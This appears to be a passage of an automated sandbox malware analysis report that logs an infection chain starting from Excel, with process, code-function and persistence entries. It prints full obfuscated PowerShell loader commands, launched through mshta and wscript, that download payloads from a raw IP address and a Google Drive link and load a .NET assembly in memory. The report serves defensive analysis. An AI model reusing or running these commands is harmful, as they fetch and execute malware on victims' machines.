gICAgICAgICAgICAgICBxdlcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJiZUtsQXF0QWEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB1TlFCdkdFdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWEROSVVWTTJVMlA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjE0Ni40Ni81Ny9waWN0dXJld2l0aGdyZWF0bmV3c3dpdGhnb29kdGhpbmdzb25iZXN0cGxhY2UudElGIiwiJEVuVjpBUFBEQVRBXHBpY3R1cmV3aXRoZ3JlYXRuZXdzd2l0aGdvb2R0aGluZ3NvbmJlLnZicyIsMCwwKTtTVEFydC1zbGVlcCgzKTtTdGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdG5ld3N3aXRoZ29vZHRoaW5nc29uYmUudmJzIg=='+[chAr]34+'))')))"Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzSG9NRVsyMV0rJFBzaE9tRVszMF0rJ3gnKSgoJ1prYWltYWdlVXJsID0gUUN4aHQnKyd0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjYnKyd2UzRzVU95Ym5ILXNEdlVoQll3dXIgUUN4O1prYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllbnQ7WmthaW1hZ2VCJysneXRlcyA9IFprYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoWmthaW1hZ2VVcmwpO1prYWltYWdlVGV4dCA9IFtTeXN0JysnZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFprYWltYWdlQnl0ZXMpO1prYXN0YXJ0RmxhZyA9IFFDeDwnKyc8QkFTRTY0X1NUQVJUPj5RQ3g7WmthZW5kRmxhZyA9IFFDeDw8QkFTRTY0X0VORD4+UUN4O1prYXN0YXJ0SW5kZXggPSBaa2FpbWFnZVRleHQuSW5kZXhPZihaa2FzdGFydEZsYWcpO1prYWVuZEluZGV4ID0gWmthaW1hZ2VUZXh0LkluZGV4T2YoWmthZW5kRmxhZycrJyk7Wmthc3RhcnRJbmRleCAtZ2UgMCAtYW4nKydkIFprYWVuZEluZGV4IC1ndCBaJysna2FzdCcrJ2FydEluZGV4O1prYXN0YXJ0SW4nKydkZXggKz0gWmthc3RhcnRGbGFnLkxlbmd0aDtaa2FiYXNlNjRMZW5ndGgnKycgPSBaa2FlbmRJbmRleCAtIFprYXN0YXJ0SW5kZXg7WmthYmFzZTY0Q29tbWFuZCA9IFprYWltYWdlVGV4dC5TdWJzdHJpbicrJ2coWmthc3RhcnRJbmRleCwgJysnWmthYmFzJysnZTY0TGVuZ3RoKTtaa2FiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChaa2FiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgS041IEZvckVhY2gtT2JqZWN0IHsgWmsnKydhXyB9KVstMS4uLShaa2FiJysnYXMnKydlNjRDb21tYW5kLkxlbmd0aCldO1prYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlJysnNjRTdHJpbmcoWmthYmFzZTY0UmV2ZXJzZWQpO1prYWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChaa2Fjb21tYScrJ25kQnl0ZXMpO1prYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoUUN4VkFJUUN4KTtaa2F2YWlNZXRob2QuSW52b2tlKFprYW51bGwsIEAoUUN4dHh0LlJSRlZHR0ZSLzc1LzY0LjY0MS40NzEuNzAxLy86cHR0aFFDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUMnKyd4ZGVzYXRpdmFkb1FDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUN4Q2FzJysnUG9sUUN4LCBRQ3hkZXNhdGl2YWRvUScrJ0N4LCBRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3gxUUN4LFFDeGRlc2F0aXZhZG9RQ3gpKTsnKS5yRVBMYUNlKChbY0hhUl05MCtbY0hhUl0xMDcrW2NIYVJdOTcpLFtzVHJJbmddW2NIYVJdMzYpLnJFUExhQ2UoJ0tONScsW3NUckluZ11bY0hhUl0xMjQpLnJFUExhQ2UoKFtjSGFSXTgxK1tjSGFSXTY3K1tjSGFSXTEyMCksW3NUckluZ11bY0hhUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $psHoME[21]+$PshOmE[30]+'x')(('ZkaimageUrl = QCxht'+'tps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur QCx;ZkawebClient = New-Object Sy'+'stem.Net.WebClient;ZkaimageB'+'ytes = ZkawebClient.DownloadData(ZkaimageUrl);ZkaimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(ZkaimageBytes);ZkastartFlag = QCx<'+'<BASE64_START>>QCx;ZkaendFlag = QCx<<BASE64_END>>QCx;ZkastartIndex = ZkaimageText.IndexOf(ZkastartFlag);ZkaendIndex = ZkaimageText.IndexOf(ZkaendFlag'+');ZkastartIndex -ge 0 -an'+'d ZkaendIndex -gt Z'+'kast'+'artIndex;ZkastartIn'+'dex += ZkastartFlag.Length;Zkabase64Length'+' = ZkaendIndex - ZkastartIndex;Zkabase64Command = ZkaimageText.Substrin'+'g(ZkastartIndex, '+'Zkabas'+'e64Length);Zkabase64Reversed = -join (Zkabase64Command.ToCharArray() KN5 ForEach-Object { Zk'+'a_ })[-1..-(Zkab'+'as'+'e64Command.Length)];ZkacommandBytes = [System.'+'Convert]::FromBase'+'64String(Zkabase64Reversed);ZkaloadedAssembly = [System.Reflection.Assembly]::Load(Zkacomma'+'ndBytes);ZkavaiMethod = [dnlib.IO.Home].Ge'+'tMethod(QCxVAIQCx);ZkavaiMethod.Invoke(Zkanull, @(QCxtxt.RRFVGGFR/75/64.641.471.701//:ptthQCx, QCxdesativadoQCx, QC'+'xdesativadoQCx, QCxdesativadoQCx, QCxCas'+'PolQCx, QCxdesativadoQ'+'Cx, QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCx1QCx,QCxdesativadoQCx));').rEPLaCe(([cHaR]90+[cHaR]107+[cHaR]97),[sTrIng][cHaR]36).rEPLaCe('KN5',[sTrIng][cHaR]124).rEPLaCe(([cHaR]81+[cHaR]67+[cHaR]120),[sTrIng][cHaR]39))"Jump to behavior
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYStEM32\windOWSpOWErsHeLL\V1.0\PoWERShelL.exe" "PoweRshElL.EXe -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE ; IeX($(Iex('[SYSTem.texT.enCoDIng]'+[chAR]0X3a+[cHAR]58+'UTf8.gETsTRInG([sYSTEM.CONverT]'+[cHAr]0x3a+[Char]58+'fRoMBASe64STrIng('+[cHaR]34+'JFhETklVVk0yVTJQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFcmRlRmlOSVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0xBYWd3b3csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHUmosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGd3cCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdlcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJiZUtsQXF0QWEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB1TlFCdkdFdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWEROSVVWTTJVMlA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjE0Ni40Ni81Ny9waWN0dXJld2l0aGdyZWF0bmV3c3dpdGhnb29kdGhpbmdzb25iZXN0cGxhY2UudElGIiwiJEVuVjpBUFBEQVRBXHBpY3R1cmV3aXRoZ3JlYXRuZXdzd2l0aGdvb2R0aGluZ3NvbmJlLnZicyIsMCwwKTtTVEFydC1zbGVlcCgzKTtTdGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdG5ld3N3aXRoZ29vZHRoaW5nc29uYmUudmJzIg=='+[chAr]34+'))')))"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzSG9NRVsyMV0rJFBzaE9tRVszMF0rJ3gnKSgoJ1prYWltYWdlVXJsID0gUUN4aHQnKyd0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjYnKyd2UzRzVU95Ym5ILXNEdlVoQll3dXIgUUN4O1prYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllbnQ7WmthaW1hZ2VCJysneXRlcyA9IFprYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoWmthaW1hZ2VVcmwpO1prYWltYWdlVGV4dCA9IFtTeXN0JysnZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFprYWltYWdlQnl0ZXMpO1prYXN0YXJ0RmxhZyA9IFFDeDwnKyc8QkFTRTY0X1NUQVJUPj5RQ3g7WmthZW5kRmxhZyA9IFFDeDw8QkFTRTY0X0VORD4+UUN4O1prYXN0YXJ0SW5kZXggPSBaa2FpbWFnZVRleHQuSW5kZXhPZihaa2FzdGFydEZsYWcpO1prYWVuZEluZGV4ID0gWmthaW1hZ2VUZXh0LkluZGV4T2YoWmthZW5kRmxhZycrJyk7Wmthc3RhcnRJbmRleCAtZ2UgMCAtYW4nKydkIFprYWVuZEluZGV4IC1ndCBaJysna2FzdCcrJ2FydEluZGV4O1prYXN0YXJ0SW4nKydkZXggKz0gWmthc3RhcnRGbGFnLkxlbmd0aDtaa2FiYXNlNjRMZW5ndGgnKycgPSBaa2FlbmRJbmRleCAtIFprYXN0YXJ0SW5kZXg7WmthYmFzZTY0Q29tbWFuZCA9IFprYWltYWdlVGV4dC5TdWJzdHJpbicrJ2coWmthc3RhcnRJbmRleCwgJysnWmthYmFzJysnZTY0TGVuZ3RoKTtaa2FiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChaa2FiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgS041IEZvckVhY2gtT2JqZWN0IHsgWmsnKydhXyB9KVstMS4uLShaa2FiJysnYXMnKydlNjRDb21tYW5kLkxlbmd0aCldO1prYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlJysnNjRTdHJpbmcoWmthYmFzZTY0UmV2ZXJzZWQpO1prYWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChaa2Fjb21tYScrJ25kQnl0ZXMpO1prYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoUUN4VkFJUUN4KTtaa2F2YWlNZXRob2QuSW52b2tlKFprYW51bGwsIEAoUUN4dHh0LlJSRlZHR0ZSLzc1LzY0LjY0MS40NzEuNzAxLy86cHR0aFFDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUMnKyd4ZGVzYXRpdmFkb1FDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUN4Q2FzJysnUG9sUUN4LCBRQ3hkZXNhdGl2YWRvUScrJ0N4LCBRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3gxUUN4LFFDeGRlc2F0aXZhZG9RQ3gpKTsnKS5yRVBMYUNlKChbY0hhUl05MCtbY0hhUl0xMDcrW2NIYVJdOTcpLFtzVHJJbmddW2NIYVJdMzYpLnJFUExhQ2UoJ0tONScsW3NUckluZ11bY0hhUl0xMjQpLnJFUExhQ2UoKFtjSGFSXTgxK1tjSGFSXTY3K1tjSGFSXTEyMCksW3NUckluZ11bY0hhUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $psHoME[21]+$PshOmE[30]+'x')(('ZkaimageUrl = QCxht'+'tps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur QCx;ZkawebClient = New-Object Sy'+'stem.Net.WebClient;ZkaimageB'+'ytes = ZkawebClient.DownloadData(ZkaimageUrl);ZkaimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(ZkaimageBytes);ZkastartFlag = QCx<'+'<BASE64_START>>QCx;ZkaendFlag = QCx<<BASE64_END>>QCx;ZkastartIndex = ZkaimageText.IndexOf(ZkastartFlag);ZkaendIndex = ZkaimageText.IndexOf(ZkaendFlag'+');ZkastartIndex -ge 0 -an'+'d ZkaendIndex -gt Z'+'kast'+'artIndex;ZkastartIn'+'dex += ZkastartFlag.Length;Zkabase64Length'+' = ZkaendIndex - ZkastartIndex;Zkabase64Command = ZkaimageText.Substrin'+'g(ZkastartIndex, '+'Zkabas'+'e64Length);Zkabase64Reversed = -join (Zkabase64Command.ToCharArray() KN5 ForEach-Object { Zk'+'a_ })[-1..-(Zkab'+'as'+'e64Command.Length)];ZkacommandBytes = [System.'+'Convert]::FromBase'+'64String(Zkabase64Reversed);ZkaloadedAssembly = [System.Reflection.Assembly]::Load(Zkacomma'+'ndBytes);ZkavaiMethod = [dnlib.IO.Home].Ge'+'tMethod(QCxVAIQCx);ZkavaiMethod.Invoke(Zkanull, @(QCxtxt.RRFVGGFR/75/64.641.471.701//:ptthQCx, QCxdesativadoQCx, QC'+'xdesativadoQCx, QCxdesativadoQCx, QCxCas'+'PolQCx, QCxdesativadoQ'+'Cx, QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCx1QCx,QCxdesativadoQCx));').rEPLaCe(([cHaR]90+[cHaR]107+[cHaR]97),[sTrIng][cHaR]36).rEPLaCe('KN5',[sTrIng][cHaR]124).rEPLaCe(([cHaR]81+[cHaR]67+[cHaR]120),[sTrIng][cHaR]39))"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xcygtrxb\xcygtrxb.cmdline"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\revod450\revod450.cmdline"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xcygtrxb\xcygtrxb.cmdline"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\revod450\revod450.cmdline"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,31_2_004044A4
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FE899B022D push eax; iretd 5_2_000007FE899B0241
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FE899B00BD pushad ; iretd 5_2_000007FE899B00C1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0044693D push ecx; ret 31_2_0044694D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0044DB70 push eax; ret 31_2_0044DB84
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0044DB70 push eax; ret 31_2_0044DBAC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_00451D54 push eax; ret 31_2_00451D61
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 41_2_0044B090 push eax; ret 41_2_0044B0A4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 41_2_0044B090 push eax; ret 41_2_0044B0CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 41_2_00451D34 push eax; ret 41_2_00451D41
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 41_2_00444E71 push ecx; ret 41_2_00444E81
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 42_2_00414060 push eax; ret 42_2_00414074
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 42_2_00414060 push eax; ret 42_2_0041409C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 42_2_00414039 push ecx; ret 42_2_00414049
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 42_2_004164EB push 0000006Ah; retf 42_2_004165C4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 42_2_00416553 push 0000006Ah; retf 42_2_004165C4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 42_2_00416555 push 0000006Ah; retf 42_2_004165C4

          Persistence and Installation Behavior

          barindex
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\revod450\revod450.dllJump to dropped file
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\xcygtrxb\xcygtrxb.dllJump to dropped file
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 41_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,41_2_004047CB
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
